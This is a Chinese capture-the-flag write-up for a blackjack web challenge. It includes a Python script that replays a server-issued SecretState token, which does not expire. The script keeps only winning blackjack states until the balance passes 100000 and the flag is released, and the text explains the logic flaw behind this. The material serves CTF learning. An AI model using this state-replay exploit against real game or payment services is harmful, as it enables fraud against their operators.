前言
题解
原来是打牌游戏。
看下cookie,是空的。
抓个包吧。
还有js代码能看,但不知道怎样才能拿到flag。
啊 这个能看到规则
大概就是赢到100000然后拿flag吧
还以为是真的要想办法改点什么东西,没想到真的要通过打牌
import requests
start = "http://e55998dd-c347-4c45-b0c8-dc9ede19d51e.node3.buuoj.cn/api"
deal = start + "/deal"
# 开局
state = requests.post(start).json()["SecretState"]
while True:
# 下注
try:
resp = requests.post(deal, json={"Bet": 500, "SecretState": state}).json()
except:
continue
if resp['GameState'] == 'Blackjack':
state = resp['SecretState']
print(resp['Balance'])
if resp['Balance'] > 100000:
print(resp)
break我们在每次请求都会有一个SecretState参数,用来保存游戏状态,并且在客户端和服务端同步。这个参数没法篡改。每次请求,服务端都会生成一个新的SecretState,但是旧的SecretState并不失效,问题就出在于此。
游戏如果赢了,就更新SecretState,如果输了,则不更新SecretState。这样就可以达到类似一种分数只增不减的效果。
但是有个问题,下注之后要开牌的话,必须得用新的SecretState,而下注的时候分数已经扣了,这样输的状态依然存在。
这就需要利用21点里一个规则,如果先发的2张牌已经是21点(black jack),则直接赢。这种状态下可以省去开牌那一步。
![刷题笔记:[HCTF 2018]Hideandseek](/medias/featureimages/47.jpg)
![刷题笔记:[HFCTF 2021 Final]easyflask](/medias/featureimages/70.jpg)